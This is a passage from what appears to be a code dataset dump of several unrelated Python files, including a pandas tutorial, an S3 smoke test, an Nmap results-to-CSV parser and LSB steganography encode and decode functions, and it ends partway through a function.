role_manager.grantPermissionToRole(permissions.VIEW, \n roles.MEMBER)\n\n # grant VIEW to unauthenticated users.\n prin_manager = IPrincipalPermissionManager(self.context)\n unauth = zope.component.queryUtility(IUnauthenticatedGroup,\n context=self.context)\n if unauth is not None:\n prin_manager.grantPermissionToPrincipal(permissions.VIEW, \n unauth.id)\n","sub_path":"Sandbox/darrylcousins/tfws.website/tfws.website/tfws/website/site.py","file_name":"site.py","file_ext":"py","file_size_in_byte":11513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"640049570","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\n\"\"\"\nCreated on Sat Sep 12 10:23:55 2020\n\n@author: hankui\n\n\"\"\"\n\n\n# Link to question: https://leetcode.com/problems/shuffle-the-array/\n\n\n#%%\ntest = [2,5,1,3,4,7]\n\n\n#%%\ndef shuffle(nums):\n \n half_l = int(len(nums)/2)\n \n res = []\n \n for i in range(half_l):\n #print(i)\n res.extend([nums[i],nums[i+half_l]])\n \n return res\n\n\n#%%\nshuffle(test)","sub_path":"Q1470_shuffle.py","file_name":"Q1470_shuffle.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"364428098","text":"\n\nimport numpy as np\n\n# Pandas, conventionally imported as pd\nimport pandas as pd\n\n# Plotting modules and settings.\nimport matplotlib.pyplot as plt\nimport seaborn as sns\ncolors = ['#1f77b4', '#ff7f0e', '#2ca02c', '#d62728',\n '#9467bd', '#8c564b', '#e377c2', '#7f7f7f',\n '#bcbd22', '#17becf']\nsns.set(style='whitegrid', palette=colors, rc={'axes.labelsize': 16})\n\n# make data\n# Dictionary of top men's World Cup scorers and how many goals\nwc_dict = {'Klose': 16,\n 'Ronaldo': 15,\n 'Müller': 14,\n 'Fontaine': 13,\n 'Pelé': 12,\n 'Kocsis': 11,\n 'Klinsmann': 11}\n\n#convert dictionary into a Series\ns_goals = pd.Series(wc_dict)\n\n# Dictionary of nations\nnation_dict = {'Klose': 'Germany',\n 'Ronaldo': 'Brazil',\n 'Müller': 'Germany',\n 'Fontaine': 'France',\n 'Pelé': 'Brazil',\n 'Kocsis': 'Hungary',\n 'Klinsmann': 'Germany'}\n\ns_nations = pd.Series(nation_dict)\n\ndf_wc = pd.DataFrame({'nation':s_nations, 'goals':s_goals})\n","sub_path":"pandas_tut.py","file_name":"pandas_tut.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"171809726","text":"#!/bin/env python\n\n\"\"\"\nThis script is a basic smoke test for the s3 protocol\n1. List buckets\n2. Create bucket\n3. Upload file\n4. Copy file between buckets\n5. Download file #to-do\n6. Remove file\n7. Remove bucket\n#ref: https://github.com/ceph/s3-tests/blob/master/s3tests_boto3/common.py\n\"\"\"\n\nimport boto3\nimport time\nimport os\nfrom botocore.exceptions import ClientError\nimport logging\n\n##########config\nENDPOINT_URL = 'https://s3.amazonaws.com'\nACCESS_KEY = '12345'\nSECRET_KEY = '12345'\nPREFIX = 's3-tests'\n\n#Boto3 resources\ndef resource():\n s3 = boto3.resource('s3',\n aws_access_key_id=ACCESS_KEY,\n aws_secret_access_key=SECRET_KEY,\n endpoint_url = ENDPOINT_URL)\n return s3\ns3 = resource()\n\n#Client resources\ndef client():\n s32 = boto3.client('s3',\n aws_access_key_id=ACCESS_KEY,\n aws_secret_access_key=SECRET_KEY,\n endpoint_url = ENDPOINT_URL)\n return s32\ns32 = client()\n\n#Generate bucket name\ndef nameGen():\n epoch_time = int(time.time())\n prefix = PREFIX\n mybucket = (prefix) + (str(epoch_time))\n return mybucket\n\n#Create random bucket\ndef createBucket():\n bucket = nameGen()\n print(\"Created: \" + \"s3://\" + bucket)\n s3.create_bucket(Bucket=bucket)\n time.sleep(1)\n return bucket\n\ndef listBucket():\n for bucket in s3.buckets.all():\n print(\"{}\".format(\"s3://\" + bucket.name))\n\n#Create basic txt object\ndef createObject():\n #print(\"pwd: \" + os.getcwd())\n f = open(\"object1.txt\", \"w\")\n f.write(\"Object Data\")\n f.close()\n f = open(\"object1.txt\", \"r\")\n #print(\"object1.txt \\n \" + f.read())\ncreateObject()\n\n#Delete basic txt object\ndef osCleanUp():\n print(os.getcwd())\n os.remove(\"object1.txt\")\n print(\" Removed:\\n \" + \"object1.txt\")\n\n##########tests\ndef create_bucket():\n #Create and delete bucket\n bucket1 = createBucket()\n s3.Bucket(bucket1).delete()\ncreate_bucket()\n\ndef create_bucket_and_object():\n #Upload object\n bucket2 = createBucket()\n s32.upload_file(\n \"object1.txt\", bucket2 , \"object1.txt\")\n s3.Object(bucket2, \"object1.txt\").delete()\n s3.Bucket(bucket2).delete()\ncreate_bucket_and_object()\n\ndef copy_objects_between_buckets():\n #copy object between two buckets\n bucket3 = createBucket()\n bucket4 = createBucket()\n s32.upload_file(\n \"object1.txt\", bucket3 , \"object1.txt\")\n copy_source = {\n 'Bucket': bucket3,\n 'Key': 'object1.txt'}\n s3.meta.client.copy(copy_source, bucket4, 'object1.txt')\n s3.Object(bucket3, \"object1.txt\").delete()\n s3.Object(bucket4, \"object1.txt\").delete()\n s3.Bucket(bucket3).delete()\n s3.Bucket(bucket4).delete()\ncopy_objects_between_buckets()\n\n#debug\nprint(\"Tests complete. Cleaning up.\\n Left over buckets:\")\nlistBucket()\nosCleanUp()\n","sub_path":"scripts/python/s3tests.py","file_name":"s3tests.py","file_ext":"py","file_size_in_byte":2762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"149005672","text":"import os\nfrom InquirerPy.utils import color_print\n\nfrom .async_tasks.randomize import Randomizer\n\nclass Session:\n '''\n this one's in charge of activating session-related tasks\n '''\n\n def __init__(self,client):\n self.client = client \n\n try:\n self.previous_presence = self.client.fetch_presence()\n except:\n self.previous_presence = {}\n self.presence = self.previous_presence\n self.ingame = False\n\n async def randomizer_check(self):\n if (self.presence[\"sessionLoopState\"] != self.previous_presence[\"sessionLoopState\"]) and (self.previous_presence[\"sessionLoopState\"] == \"INGAME\" and self.presence[\"sessionLoopState\"] == \"MENUS\"):\n color_print([(\"Cyan bold\",\"-- GG --\")])\n Randomizer(self.client)\n \n async def update_presence(self):\n self.previous_presence = self.presence \n\n try:\n self.presence = self.client.fetch_presence()\n await self.randomizer_check()\n except:\n color_print([(\"Tomato\",\"VALORANT não está mais rodando, saindo...\")])\n os._exit(1)\n\n return self.presence\n","sub_path":"src/core_game/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"332149890","text":"import pygame\r\n\r\nclass Screen_Display():\r\n def text_objects(text, font, color):\r\n textSurface = font.render(text, True, color)\r\n return textSurface, textSurface.get_rect()\r\n\r\n def message_display(gD, text, size, color, centerX, centerY):\r\n font = pygame.font.SysFont('arial', size)\r\n textSurf, TextRect = Screen_Display.text_objects(text, font, color)\r\n TextRect.center = ((centerX),(centerY))\r\n gD.blit(textSurf, TextRect)\r\n\r\nclass Button():\r\n def __init__(self, rect, text, textsize, textcolor):\r\n self.rect = rect\r\n self.font = pygame.font.SysFont('arial', textsize)\r\n self.textSurf, self.textRect = Screen_Display.text_objects(text, self.font, textcolor)\r\n self.textRect.center = ((rect[0] + (rect[2]/2), rect[1] + (rect[3]/2)))\r\n\r\n def draw(self, gD, ButColor):\r\n pygame.draw.rect(gD, ButColor, (self.rect))\r\n gD.blit(self.textSurf, self.textRect)\r\n\r\n def optClick(self, gD, ShadowColor, ButColor, command=None, command2=None):\r\n mouse = pygame.mouse.get_pos()\r\n click = pygame.mouse.get_pressed()\r\n if self.rect[0] + self.rect[2] > mouse[0] > self.rect[0] and self.rect[1] + self.rect[3] > mouse[1] > self.rect[1]:\r\n pygame.draw.rect(gD, ShadowColor, (self.rect))\r\n gD.blit(self.textSurf, self.textRect)\r\n if click[0] == 1:\r\n if command != None:\r\n command()\r\n if command2 != None:\r\n command2()\r\n else:\r\n pygame.draw.rect(gD, ButColor, (self.rect))\r\n gD.blit(self.textSurf, self.textRect)\r\n\r\nclass InvisButton():\r\n def __init__(self, rect):\r\n self.rect = rect\r\n\r\n def optClick(self, command=None, command2=None):\r\n mouse = pygame.mouse.get_pos()\r\n click = pygame.mouse.get_pressed()\r\n if self.rect[0] + self.rect[2] > mouse[0] > self.rect[0] and self.rect[1] + self.rect[3] > mouse[1] > self.rect[1]:\r\n if click[0] == 1:\r\n if command != None:\r\n command()\r\n if command2 != None:\r\n command2()\r\n\r\n","sub_path":"WebAppStuff/PyGameFuncs.py","file_name":"PyGameFuncs.py","file_ext":"py","file_size_in_byte":2206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"519367472","text":"from pprint import pprint\n\nfts ={'09:35': 'FREEPORT',\n\t '17:00': 'FREEPORT',\n\t '09:55': 'WEST END',\n\t '19:00': 'WEST END',\n\t '10:45': 'TREASURE CAY',\n\t '12:00': 'TREASURE CAY',\n\t '11:45': 'ROCK SOUND',\n\t '17:55': 'ROCK SOUND',}\n\n\ndests = set(fts.values())\n\ndests_of_flights = []\n#for destination in dests:\n# dests_of_flights(destination) = []\nfor k, v in fts.items():\n if v == 'WEST END':\n dests_of_flights.append(k)\n\nprint(dests_of_flights)\n\ndests_of_flights_1 = [k for k,v in fts.items() if v == 'WEST END']\n\nprint(dests_of_flights_1)\n\n\nunique_dest_n_time = {}\nfor dest in dests:\n unique_dest_n_time[dest] = [k for k,v in fts.items() if v == dest]\n\npprint(unique_dest_n_time)\n\n'''Generator of dictionaries with nested lists generator'''\nunique_dest_n_time_2 = {dest: [k for k,v in fts.items() if v == dest] for dest in set(fts.values())}\n\npprint(unique_dest_n_time_2)\n","sub_path":"webapp_test_drive5_14_2021/generators_try_3.py","file_name":"generators_try_3.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"594804278","text":"#!/usr/bin/env python\n# Standard Python libraries.\nimport csv\nimport glob\nimport os\nimport shutil\n\n# Third party Python libraries.\nfrom libnmap.parser import NmapParser\n\n# Custom Python libraries.\n\n\nclass ScanEvent:\n\n # Variables that will eventually be fields in big data analytics platform.\n def __init__(self):\n self.start_time = \"\"\n self.end_time = \"\"\n self.site_name = \"\"\n self.scanner = \"\"\n self.address = \"\"\n self.transport = \"\"\n self.port = \"\"\n self.app = \"\"\n self.app_version = \"\"\n self.state = \"\"\n\n def to_list(self):\n output = []\n output.append(self.start_time)\n output.append(self.end_time)\n output.append(self.site_name)\n output.append(self.scanner)\n output.append(self.address)\n output.append(self.transport)\n output.append(self.port)\n output.append(self.app)\n output.append(self.app_version)\n output.append(self.state)\n\n return output\n\n\ndef export_to_csv(events, output):\n output = output.replace(\".xml\", \".csv\")\n if len(events) != 0:\n\n header_fields = [\n \"starttime\",\n \"endtime\",\n \"siteName\",\n \"scanner\",\n \"dest_ip\",\n \"transport\",\n \"dest_port\",\n \"app\",\n \"service\",\n \"state\",\n ]\n\n with open(output, \"w\") as csvfile:\n writer = csv.writer(csvfile)\n writer.writerow(header_fields)\n\n for event in events:\n writer.writerow(event.to_list())\n\n\ndef main():\n root_dir = \"/home/scantron/master\"\n\n # Build directory paths.\n complete_dir = os.path.join(root_dir, \"scan_results\", \"complete\")\n processed_dir = os.path.join(root_dir, \"scan_results\", \"processed\")\n bigdata_analytics_dir = os.path.join(root_dir, \"for_bigdata_analytics\")\n\n # Grab a list of xml files from the \"complete\" folder.\n xml_scans = glob.glob(os.path.join(complete_dir, \"*.xml\"))\n\n # Loop through all valid xml files and export them to csv files, then move them to the \"processed\" directory.\n for scan in xml_scans:\n\n try:\n events = []\n report = NmapParser.parse_fromfile(scan)\n\n # Loop though all hosts in xml file. Create event objects storing the necessary information.\n for host in report.hosts:\n # Loop through services for each host.\n if len(host.services) != 0:\n for service in host.services:\n event = ScanEvent()\n event.start_time = report.started\n event.end_time = report.endtime\n\n # \"scan\" variable is constructed as \"result_file_base_name\" in master/scan_scheduler.py\n scan_file_name = os.path.basename(scan)\n event.site_name = scan_file_name.split(\"__\")[0]\n event.scanner = scan_file_name.split(\"__\")[1]\n\n # Extract port and service information.\n event.address = host.address\n event.transport = service.protocol\n event.port = service.port\n event.app = service.service\n event.state = service.state\n\n data = service.service_dict\n event.app_version = \"\"\n if \"product\" in data:\n event.app_version += f\"{data['product']}\"\n if \"version\" in data:\n event.app_version += f\"{data['version']}\"\n if \"extrainfo\" in data:\n event.app_version += f\"{data['extrainfo']}\"\n\n events.append(event)\n\n # The file has been completely parsed...create csv files in \"for_bigdata_analytics\" directory.\n export_to_csv(events, os.path.join(bigdata_analytics_dir, os.path.basename(scan)))\n\n # Extract the base file name from the .xml scan file name.\n base_scan_file_name = os.path.basename(scan).split(\".xml\")[0]\n\n # Find all the .nmap, .xml, and .gnmap files for the base_scan_file_name.\n base_scan_files = glob.glob(os.path.join(complete_dir, f\"{base_scan_file_name}*\"))\n\n # csv files have been created, move all nmap scan file types from \"completed\" to \"processed\" folder.\n # Extract file name and rebuild full path for destination.\n for scan_file in base_scan_files:\n shutil.move(\n scan_file, # source\n os.path.join(os.path.join(processed_dir, scan_file.split(\"/\")[-1])), # destination\n )\n\n except Exception as e:\n print(f\"Exception processing file: {scan}. Exception: {e}\")\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"master/scan_results/nmap_to_csv.py","file_name":"nmap_to_csv.py","file_ext":"py","file_size_in_byte":4953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"355065957","text":"import numpy as np\nimport fplib_FD\nimport sys\n\n# Move function `readvasp(vp)` from test set to `fplib_FD.py`\n\ndef test2(v1, v2):\n ntyp = 1\n nx = 300\n lmax = 1\n cutoff = 6.5\n znucl = np.array([3], int)\n lat1, rxyz1, types = fplib_FD.readvasp(v1)\n lat2, rxyz2, types = fplib_FD.readvasp(v2)\n contract = False\n fp1 = fplib_FD.get_fp(contract, ntyp, nx, lmax, lat1, rxyz1, types, znucl, cutoff)\n fp2 = fplib_FD.get_fp(contract, ntyp, nx, lmax, lat2, rxyz2, types, znucl, cutoff)\n\n dist = fplib_FD.get_fpdist(ntyp, types, fp1, fp2)\n print ('fingerprint distance: ', dist)\n\n\nif __name__ == \"__main__\":\n args = sys.argv\n v1 = args[1]\n v2 = args[2]\n test2(v1, v2)\n","sub_path":"fplib_test/fp_basic_test2.py","file_name":"fp_basic_test2.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"407647822","text":"# -*- coding: utf-8 -*-\n\"\"\"\nFunction that creates an 2D data table with probability and elevation angle as the\nvarrying inputs using the square tiled rectangle approach. \n\nCreated on Wed Oct 28 13:05:02 2020\n\nCopywrite The Aerospace Corporation 2020\n\n@author: MAW32652\n\"\"\"\n\nimport itur\nimport numpy as np\nfrom tiler import tiler\n\n###Default input variables \nlat = 39 #latitude\nlon = 283 #longitude\nhs = 1 #altitude [km]\nf = 20 #frequency [GHz]\nd = 3 #antenna diameter [m] \ntau = 45 #polarization tilt angle [degrees]\n\ndef tiledTable(pList, eleList, lat = lat, lon = lon, hs = hs, f = f, d = d, tau = tau):\n #check to see if this is the first iteration. \n #if it is, create an array of correct dimmensions for output\n output = np.zeros((len(pList), len(eleList)))\n \n #Variable initialization\n eleCount = 0\n pCount = 0\n \n dimList = tiler(eleList, pList, dimList = [])\n \n for dim in dimList:\n \n #Case where the input lists are of the same length\n if len(pList) == len(eleList):\n #Calculate the results \n result = itur.atmospheric_attenuation_slant_path(lat, lon, f, eleList, pList, d, hs, return_contributions =False, include_gas = True)\n \n #replace the correct data cells in the output array.\n output[pCount : pCount + len(eleList), eleCount : eleCount + len(pList)] = result\n \n #case where the pList dimension is larger than the eleList dimension.\n elif len(pList) > len(eleList):\n #Calculate the results for pList - eleList and all of eleList\n result = itur.atmospheric_attenuation_slant_path(lat, lon, f, eleList, pList[:dim], d, hs, return_contributions =False, include_gas = True) \n \n #replace the correct data cells in the output array. \n #the p rows that havent beel filled plus the number of rows equal to dim\n #all the ele columns that havent already been filled. \n output[pCount : pCount + dim, eleCount:] = result\n \n \n #update the offset variables\n pCount += dim\n pList = pList[dim:]\n \n \n #case where the eleList dimension is larger than the pList dimension.\n elif len(eleList) > len(pList):\n #Calculate and append the results for all of pList and eleList - pList.\n result = itur.atmospheric_attenuation_slant_path(lat, lon, f, eleList[:dim], pList, d, hs, return_contributions =False, include_gas = True)\n \n #replace the correct data cells in the output array. \n #all of the p rows that havent been filled\n #the ele columns that havent been filled plus the number of columns equal to dim\n output[pCount:, eleCount: eleCount + dim] = result\n \n \n #update the offset variables\n eleCount += dim\n eleList = eleList[dim:] \n return output\n","sub_path":"tiledTable.py","file_name":"tiledTable.py","file_ext":"py","file_size_in_byte":2975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"349157398","text":"##\r\n\r\n# Authors: Scott Towne and Jeriah Caplinger\r\n\r\n# Description: This file contains the functions used to implement steganography\r\n\r\n# Version: May 2019\r\n##\r\n\r\nfrom FileFunctions import select_encoded_file, select_text_file\r\nfrom PIL import Image\r\nimport subprocess\r\nimport sys\r\nimport numpy as np\r\nimport os\r\n\r\n\r\n\"\"\"\r\nThis function encodes an image with text data using the lsb algorithm.\r\n@param: copyLocation the path to the image in the Spike folder currently being displayed\r\n@return: returns 0 if it could not encode, returns nothing otherwise\r\n\"\"\"\r\ndef lsb_alg_text(copyLocation):\r\n file_location = str(select_text_file())\r\n array = file_location.split(\"\\'\")\r\n file = array[1]\r\n file_location = file\r\n \r\n \r\n # we open our cover image\r\n # and get the dimensions of the cover image for use in determining if we can encode our\r\n # data into th eimage\r\n cover_image = Image.open(copyLocation)\r\n # pixels there are\r\n cover_width, cover_height = cover_image.size\r\n \r\n # loads our pixels from our cover image\r\n cover_pixs = cover_image.load()\r\n \r\n # for use in bit level manipulations\r\n encode_a_0 = 254\r\n encode_a_1 = 1\r\n \r\n # indexes of the cover image for encoding\r\n cover_i= 0\r\n cover_j = 0\r\n # which lsb we are on\r\n max_lsb_used = 0\r\n \r\n text = open(file_location, \"r\")\r\n message_list = list(text.read())\r\n text.close()\r\n \r\n \r\n # we use these numbers to determine if we can encode the text file into the\r\n # image\r\n max_size = (cover_width * cover_height)\r\n total_bits = len(message_list)\r\n \r\n #if we cannot encode the text file \r\n if total_bits > max_size:\r\n print(\"Sorry, the cover image is not big enough to encode the text file.\")\r\n return 0\r\n \r\n \r\n for character in message_list:\r\n binary_list = char_to_binary(character)\r\n #we encode every bit in that pixel\r\n while len(binary_list) != 0:\r\n bit_to_encode = int(binary_list.pop(0))\r\n \r\n # just means we need to go on to the next line\r\n if cover_j == cover_width:\r\n cover_j = 0\r\n cover_i += 1\r\n # means we are at the end of our image\r\n if cover_i == cover_height:\r\n encode_a_0 = encode_a_0 & 127 # from 11111110 becomes 011111110\r\n encode_a_0 = encode_a_0 << 1 # then 11111100\r\n encode_a_0 = encode_a_0 | encode_a_1 # finally 11111101\r\n # for encoding a 1, it is quite simple: 00000001 becomes 00000010\r\n encode_a_1 = encode_a_1 << 1\r\n cover_i = 0\r\n max_lsb_used += 1\r\n \r\n \r\n get_cover_px = cover_pixs[cover_j, cover_i]\r\n \r\n #the section of bits that we are going to encode \r\n get_blue_bits = get_cover_px[2] \r\n \r\n \r\n if bit_to_encode == 0:\r\n # we and with because we need to \"implant\" a 0 in the lsb\r\n get_blue_bits = get_blue_bits & encode_a_0\r\n encoded_pixel = (get_cover_px[0], get_cover_px[1], get_blue_bits)\r\n cover_pixs[cover_j, cover_i] = encoded_pixel\r\n cover_j += 1\r\n elif bit_to_encode == 1:\r\n # we or because we need to \"implant\" a 1 in the lsb\r\n get_blue_bits = get_blue_bits | encode_a_1\r\n encoded_pixel = (get_cover_px[0], get_cover_px[1], get_blue_bits)\r\n cover_pixs[cover_j, cover_i] = encoded_pixel\r\n cover_j += 1\r\n \r\n cover_image.save(copyLocation)\r\n \r\n write_text_key(cover_j, cover_i, max_lsb_used)\r\n \r\n print(\"successfully encoded\") \r\n\r\n\r\n\r\n\"\"\"\r\nFunction that decodes an image that has text encoded inside of it using the LSB algorithm\r\n@param: copyLocation the path to the image in the Spike folder currently being displayed\r\n\"\"\"\r\ndef decode_lsb_text(copyLocation):\r\n # gets all parameters that we need to decode\r\n key_file = select_text_file()\r\n key_array = read_key(key_file)\r\n last_j = int(key_array[0])\r\n last_i = int(key_array[1])\r\n max_lsb_used = int(key_array[2])\r\n \r\n #gets all the pixels from the encoded image\r\n encoded_image = Image.open(copyLocation)\r\n encoded_px = encoded_image.load()\r\n cover_width, cover_height = encoded_image.size\r\n \r\n encode_i = 0\r\n encode_j = 0\r\n extract_a_bit = 1\r\n shift_bits = 0\r\n # holds the chars and text that make up the secret text\r\n complete_text = []\r\n complete_char = []\r\n \r\n \r\n # we iterate through the cover image \r\n while encode_i < cover_height and max_lsb_used > 0:\r\n if encode_i == last_i:\r\n cover_width = last_j\r\n while encode_j < cover_width:\r\n # grab a pixel from the cover image and get the blue bits i.e. the one with the secret data\r\n encoded_rgb = encoded_px[encode_j, encode_i]\r\n blue_coded_bits = encoded_rgb[2]\r\n # we get the lsb\r\n decoded = blue_coded_bits & extract_a_bit\r\n decoded = decoded >> shift_bits\r\n\r\n \r\n complete_char.insert(0, decoded)\r\n # we continue to do this until we have enough bits to make up a char\r\n if len(complete_char) == 8:\r\n # we have to reverse the bit list because of the order of popping/inserting\r\n complete_char.reverse()\r\n \r\n our_char = chr(int(binary_to_string(complete_char), 2))\r\n # empty our char list\r\n complete_char = []\r\n \r\n complete_text.append(our_char)\r\n encode_j += 1\r\n encode_j = 0\r\n encode_i += 1\r\n if encode_i == cover_height:\r\n encode_i = 0\r\n max_lsb_used = max_lsb_used - 1\r\n extract_a_bit = extract_a_bit << 1\r\n shift_bits += 1\r\n \r\n \r\n \r\n \r\n # we iterate through the cover image\r\n while encode_i <= last_i:\r\n if encode_i == last_i:\r\n cover_width = last_j\r\n while encode_j < cover_width:\r\n # grab a pixel from the cover image and get the blue bits i.e. the one with the secret data\r\n encoded_rgb = encoded_px[encode_j, encode_i]\r\n blue_coded_bits = encoded_rgb[2]\r\n # we get the lsb\r\n decoded = blue_coded_bits & extract_a_bit\r\n decoded = decoded >> shift_bits\r\n\r\n \r\n complete_char.insert(0, decoded)\r\n # we continue to do this until we have enough bits to make up a char\r\n if len(complete_char) == 8:\r\n # we have to reverse the bit list because of the order of popping/inserting\r\n complete_char.reverse()\r\n \r\n our_char = chr(int(binary_to_string(complete_char), 2))\r\n # empty our char list\r\n complete_char = []\r\n \r\n complete_text.append(our_char)\r\n encode_j += 1\r\n encode_j = 0\r\n encode_i += 1\r\n \r\n \r\n \r\n if os.path.exists(\"decoded_message.txt\"):\r\n append_write = 'a' # append if already exists\r\n else:\r\n append_write = 'w' # make a new file if not\r\n \r\n secrets = open(\"decoded_message.txt\", append_write)\r\n secrets.write(binary_to_string(complete_text))\r\n secrets.close()\r\n\r\n\r\n \r\n \r\n# IMAGE LSB\r\n\"\"\"\r\nFunction that encodes an image inside another image using the LSB algorithm\r\n@param: copyLocation the path to the image in the Spike folder currently being displayed\r\n@return: returns 0 if it could not encode, returns nothing otherwise\r\n\"\"\"\r\ndef lsb_alg_img(copyLocation):\r\n # gets our image we want to encode\r\n secret = copyLocation\r\n \r\n \r\n # we open our secret image\r\n secret_image = Image.open(secret)\r\n # pixels there are\r\n secret_width, secret_height = secret_image.size\r\n \r\n secret_size = (secret_width * secret_height)*3\r\n \r\n # WE WANT TO ITERATE THROUGH THE ENTIRE LENGTH WISE OF THE PICTURE THEN MOVE\r\n # TO THE SECOND LINE... so when we do the double loop, we want to do HEIGHT then WIDTH!\r\n \r\n \r\n cover = str(select_encoded_file())\r\n array = cover.split(\"\\'\")\r\n file = array[1]\r\n cover = file\r\n \r\n \r\n # we open our cover image\r\n cover_image = Image.open(cover)\r\n # we get the dimensions of the secret image for use in determining how many\r\n # pixels there are\r\n cover_width, cover_height = cover_image.size\r\n max_size = cover_width * cover_height\r\n \r\n #TODO: this is the check to ensure you can encode the image into the cover\r\n #TODO: handle this however you want\r\n if secret_size > max_size:\r\n print(\"Sorry, cover image is not big enough to encode in\") \r\n return 0 \r\n \r\n \r\n # loads our pixels from our cover image\r\n cover_pixs = cover_image.load()\r\n #loads our pixels from our secret image\r\n secret_pixs = secret_image.load()\r\n \r\n encode_a_0 = 254\r\n encode_a_1 = 1\r\n \r\n cover_i= 0\r\n cover_j = 0\r\n max_lsb_used = 0\r\n \r\n i = 0\r\n j = 0\r\n# we iterate through each pixel in the image we want to hide\r\n while i < secret_height:\r\n while j < secret_width:\r\n # get the bits that represent that pixel\r\n secret_bits = pixel_to_binary_list(secret_pixs[j,i])\r\n #we encode every bit in that pixel\r\n while len(secret_bits) != 0:\r\n bit_to_encode = int(secret_bits.pop(0))\r\n \r\n # just means we need to go on to the next line\r\n if cover_j == cover_width:\r\n cover_j = 0\r\n cover_i += 1\r\n # means we are at the end of our image\r\n if cover_i == cover_height:\r\n encode_a_0 = encode_a_0 & 127 # from 11111110 becomes 011111110\r\n encode_a_0 = encode_a_0 << 1 # then 11111100\r\n encode_a_0 = encode_a_0 | encode_a_1 # finally 11111101\r\n # for encoding a 1, it is quite simple: 00000001 becomes 00000010\r\n encode_a_1 = encode_a_1 << 1\r\n cover_i = 0\r\n max_lsb_used += 1\r\n \r\n \r\n get_cover_px = cover_pixs[cover_j, cover_i]\r\n \r\n #the section of bits that we are going to encode \r\n get_blue_bits = get_cover_px[2] \r\n \r\n \r\n if bit_to_encode == 0:\r\n # we and with 254 because we need to \"implant\" a 0 in the lsb\r\n get_blue_bits = get_blue_bits & encode_a_0\r\n encoded_pixel = (get_cover_px[0], get_cover_px[1], get_blue_bits)\r\n cover_pixs[cover_j, cover_i] = encoded_pixel\r\n cover_j += 1\r\n elif bit_to_encode == 1:\r\n get_blue_bits = get_blue_bits | encode_a_1\r\n encoded_pixel = (get_cover_px[0], get_cover_px[1], get_blue_bits)\r\n cover_pixs[cover_j, cover_i] = encoded_pixel\r\n cover_j += 1 \r\n j += 1\r\n j = 0\r\n i += 1\r\n \r\n cover_image.save(copyLocation)\r\n \r\n # writes the info we need to decode the image to a text file\r\n write_key(cover_j, cover_i, secret_width, max_lsb_used)\r\n\r\n\r\n\r\n\"\"\"\r\nFunction that decodes an image that has an image encoded inside it using the LSB algorithm\r\n@param: copyLocation the path to the image in the Spike folder currently being displayed\r\n\"\"\"\r\ndef decode_lsb_img(copyLocation):\r\n # we get all parameters that we need to decode the encoded image\r\n key_file = select_text_file()\r\n key_array = read_key(key_file)\r\n last_j = int(key_array[0])\r\n last_i = int(key_array[1])\r\n secret_width = int(key_array[2])\r\n max_lsb_used = int(key_array[3])\r\n \r\n \r\n encoded_image = Image.open(copyLocation)\r\n cover_width, cover_height = encoded_image.size\r\n encoded_px = encoded_image.load()\r\n encode_i = 0\r\n encode_j = 0\r\n extract_a_bit = 1\r\n shift_bits = 0\r\n # holds bit values for a pixel\r\n complete_pixel = []\r\n # holds pixels that make up a line in a picture\r\n complete_line = []\r\n # holds the pixels and lines that make up the secret image\r\n complete_image = []\r\n \r\n # we iterate through the cover image\r\n while encode_i < cover_height and max_lsb_used > 0:\r\n while encode_j < cover_width:\r\n # grab a pixel from the cover image and get the blue bits i.e. the one with the secret data\r\n encoded_rgb = encoded_px[encode_j, encode_i]\r\n blue_coded_bits = encoded_rgb[2]\r\n # we get the lsb\r\n decoded = blue_coded_bits & extract_a_bit\r\n decoded = decoded >> shift_bits\r\n \r\n complete_pixel.insert(0, decoded)\r\n \r\n # we continue to do this until we have enough bits to make up a pixel\r\n if len(complete_pixel) == 24:\r\n # we have to reverse the bit list because of the order of popping/inserting\r\n complete_pixel.reverse()\r\n #RGB bits \r\n red_bits = binary_to_string(complete_pixel[0:8])\r\n green_bits = binary_to_string(complete_pixel[8:16])\r\n blue_bits = binary_to_string(complete_pixel[16:])\r\n\r\n #RGB bits converted to decimal\r\n red_value = int(red_bits, 2)\r\n green_value = int(green_bits, 2)\r\n blue_value = int(blue_bits, 2)\r\n \r\n # finally RGB transferred into pixel format\r\n decoded_pixel = (red_value, green_value, blue_value)\r\n # empty our pixel list\r\n complete_pixel = []\r\n \r\n complete_line.append(decoded_pixel)\r\n # when we have enough pixels to make up a line, we add it to the image\r\n if len(complete_line)== secret_width:\r\n complete_image.append(complete_line)\r\n complete_line = []\r\n encode_j += 1\r\n encode_j = 0\r\n encode_i += 1\r\n if encode_i == cover_height:\r\n encode_i = 0\r\n max_lsb_used = max_lsb_used - 1\r\n extract_a_bit = extract_a_bit << 1\r\n shift_bits += 1\r\n \r\n\r\n \r\n # we iterate through the cover image\r\n while encode_i <= last_i:\r\n if encode_i == last_i:\r\n cover_width = last_j\r\n while encode_j < cover_width:\r\n # grab a pixel from the cover image and get the blue bits i.e. the one with the secret data\r\n encoded_rgb = encoded_px[encode_j, encode_i]\r\n blue_coded_bits = encoded_rgb[2]\r\n # we get the lsb\r\n decoded = blue_coded_bits & extract_a_bit\r\n decoded = decoded >> shift_bits\r\n \r\n complete_pixel.insert(0, decoded)\r\n \r\n # we continue to do this until we have enough bits to make up a pixel\r\n if len(complete_pixel) == 24:\r\n # we have to reverse the bit list because of the order of popping/inserting\r\n complete_pixel.reverse()\r\n #RGB bits \r\n 